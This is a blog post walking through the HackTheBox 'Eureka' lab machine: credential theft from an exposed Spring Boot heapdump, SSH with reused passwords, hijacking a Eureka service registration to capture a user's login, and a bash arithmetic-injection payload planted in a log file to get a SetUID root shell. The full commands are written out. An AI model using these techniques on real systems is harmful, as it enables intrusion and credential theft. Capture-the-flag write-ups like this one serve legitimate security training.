Post

HTB Eureka Machine Writeup (Walkthrough)

Posted Updated
Preview Image
By Iven
4 min read
HTB Eureka Machine Writeup (Walkthrough)

HTB Eureka Machine Writeup

Note: This writeup was generated by AI based on multiple existing writeups and technical documentation.

Target Information

  • Target IP: 10.10.11.66
  • Difficulty: Hard
  • Operating System: Linux (Ubuntu 20.04.6 LTS)

Initial Reconnaissance

Nmap Scan

1
2

nmap -p- --min-rate 10000 10.10.11.66
nmap -p 22,80,8761 -sCV 10.10.11.66

Results:

  • Port 22: SSH OpenSSH 8.2p1 Ubuntu
  • Port 80: nginx 1.18.0 (redirects to furni.htb)
  • Port 8761: Unknown service (basic auth required)

Added furni.htb to /etc/hosts:

1

echo "10.10.11.66 furni.htb" >> /etc/hosts

Web Application Analysis

The main site at http://furni.htb is a furniture store built with Spring Boot framework. Key observations:

  • Spring Boot application (confirmed by 404 error page)
  • Registration and login functionality available
  • Shopping cart features

Directory Enumeration

Used Spring Boot-specific wordlist to discover actuator endpoints:

1

feroxbuster -u http://furni.htb -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt --dont-extract-links

Critical Discovery: /actuator/heapdump endpoint exposed

Initial Access - Spring Boot Heapdump Analysis

Heapdump Exploitation

Downloaded the heapdump file:

1

wget http://furni.htb/actuator/heapdump

Analysis Method 1: Strings

1

strings heapdump | grep -B 2 -A 2 "Authorization"

Found base64 encoded authorization header:

1

Authorization: Basic RXVyZWthU3J2cjowc2NhclBXRGlzVGhlQjNzdA==

Decoded to: EurekaSrvr:0scarPWDisTheB3st

Analysis Method 2: VisualVM

  • Loaded heapdump into VisualVM
  • Searched for database-related objects
  • Found MySQL connection string with credentials

Analysis Method 3: JDumpSpider

1

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

Extracted Credentials

  1. Database Credentials: oscar190:0sc@r190_S0l!dP@sswd
  2. Eureka Service: EurekaSrvr:0scarPWDisTheB3st

SSH Access

1
2

ssh [email protected]
# Password: 0sc@r190_S0l!dP@sswd

Successfully gained shell as oscar190.

Privilege Escalation - User Flag

Eureka Service Discovery

Discovered Netflix Eureka service registry running on port 8761. Eureka is used for service discovery and load balancing in microservices architecture.

Configuration Analysis: Located Eureka configuration in /var/www/web/Eureka-Server/target/classes/application.yaml:

1
2
3
4
5

spring:
  security:
    user:
      name: EurekaSrvr
      password: 0scarPWDisTheB3st

Service Architecture Discovery

Found multiple Spring Boot applications:

  • cloud-gateway [TCP 8080] - Spring Cloud Gateway
  • User Management [TCP 8081] - User authentication service
  • Furni website [TCP 8082] - Main e-commerce site
  • Eureka server [TCP 8761] - Service registry

Traffic Hijacking Attack

Objective: Intercept miranda-wise user’s login attempts

Process Monitoring: Used pspy to identify automated login attempts:

1

/bin/bash /opt/scripts/miranda-Login-Simulator.sh

Attack Strategy:

  1. Access Eureka dashboard at http://furni.htb:8761
  2. Register malicious service instance to hijack traffic
  3. Replace legitimate USER-MANAGEMENT-SERVICE with attacker-controlled instance

Malicious Service Registration:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

curl -X POST http://EurekaSrvr:[email protected]:8761/eureka/apps/USER-MANAGEMENT-SERVICE \
-H 'Content-Type: application/json' \
-d '{
  "instance": {
    "instanceId": "attacker-instance",
    "hostName": "10.10.14.6",
    "app": "USER-MANAGEMENT-SERVICE",
    "ipAddr": "10.10.14.6",
    "vipAddress": "USER-MANAGEMENT-SERVICE",
    "status": "UP",
    "port": {
      "$": 8081,
      "@enabled": "true"
    },
    "dataCenterInfo": {
      "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
      "name": "MyOwn"
    }
  }
}'

Traffic Interception: Set up listener on port 8081:

1

nc -lnvp 8081

Captured Credentials:

1
2
3
4

POST /login HTTP/1.1
Content-Type: application/x-www-form-urlencoded

username=miranda.wise%40furni.htb&password=IL%21veT0Be%26BeT0L0ve&_csrf=...

URL decoded password: IL!veT0Be&BeT0L0ve

SSH as miranda-wise

1
2

ssh [email protected]
# Password: IL!veT0Be&BeT0L0ve

Retrieved user flag:

1

cat /home/miranda-wise/user.txt

Root Privilege Escalation

System Analysis

Group Membership: miranda-wise is member of developers group with write access to /var/www/web directory.

Process Monitoring: Identified automated log analysis script:

1

2025/04/30 14:42:03 CMD: UID=0 PID=1404997 | /bin/bash /opt/log_analyse.sh /var/www/web/cloud-gateway/log/application.log

Vulnerable Script Analysis

Located /opt/log_analyse.sh - a log analysis script with command injection vulnerability in the analyze_http_statuses() function:

1
2
3
4
5
6
7
8
9
10
11

analyze_http_statuses() {
    while IFS= read -r line; do
        code=$(echo "$line" | grep -oP 'Status: \K.*')
        # ... processing logic ...
        if [[ "$existing_code" -eq "$code" ]]; then  # VULNERABLE LINE
            new_count=$((existing_count + 1))
            STATUS_CODES[$i]="${existing_code}:${new_count}"
            break
        fi
    done < <(grep "HTTP.*Status: " "$LOG_FILE")
}

Vulnerability: Bash arithmetic evaluation (-eq) executes the content of variables as arithmetic expressions, allowing command injection via array notation.

Exploitation Strategy

Log File Manipulation: Although direct write access to log files is denied, developers group has directory write permissions, allowing file replacement.

Payload Construction:

1
2
3
4
5

# Remove existing log file
rm /var/www/web/cloud-gateway/log/application.log

# Create malicious log entry
echo 'HTTP Status: x[$(cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash)]' > /var/www/web/cloud-gateway/log/application.log

Exploitation Process:

  1. Wait for cron job to execute log analysis script
  2. Script processes malicious log entry
  3. Arithmetic evaluation triggers command execution
  4. SetUID bash binary created

Root Shell

1
2

# Execute SetUID bash with preserved permissions
/tmp/rootbash -p

Retrieved root flag:

1

cat /root/root.txt

Key Attack Vectors Summary

  1. Spring Boot Actuator Misconfiguration: Exposed heapdump containing sensitive credentials
  2. Password Reuse: Database credentials valid for SSH access
  3. Netflix Eureka Traffic Hijacking: Service registry manipulation to intercept user authentication
  4. Bash Arithmetic Injection: Command injection via vulnerable log analysis script

Tools Used

  • nmap: Port scanning and service enumeration
  • feroxbuster: Web directory fuzzing
  • VisualVM: Java heapdump analysis
  • JDumpSpider: Automated heapdump credential extraction
  • pspy: Process monitoring
  • curl: HTTP requests and API interaction
  • netcat: Traffic interception

Lessons Learned

  1. Actuator Security: Spring Boot actuator endpoints should be properly secured and not exposed publicly
  2. Service Registry Security: Netflix Eureka requires proper authentication and authorization
  3. Input Validation: Bash scripts processing user input must validate data to prevent injection attacks
  4. Credential Management: Avoid storing sensitive credentials in memory dumps or configuration files
  5. Principle of Least Privilege: Users should have minimal necessary permissions

Timeline

  • Reconnaissance: ~15 minutes
  • Initial Access: ~30 minutes (heapdump analysis)
  • User Privilege Escalation: ~45 minutes (Eureka exploitation)
  • Root Privilege Escalation: ~30 minutes (script analysis and exploitation)
  • Total Time: ~2 hours

Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Hard
Writeup HTB-Hard
This post is licensed under CC BY 4.0 by the author.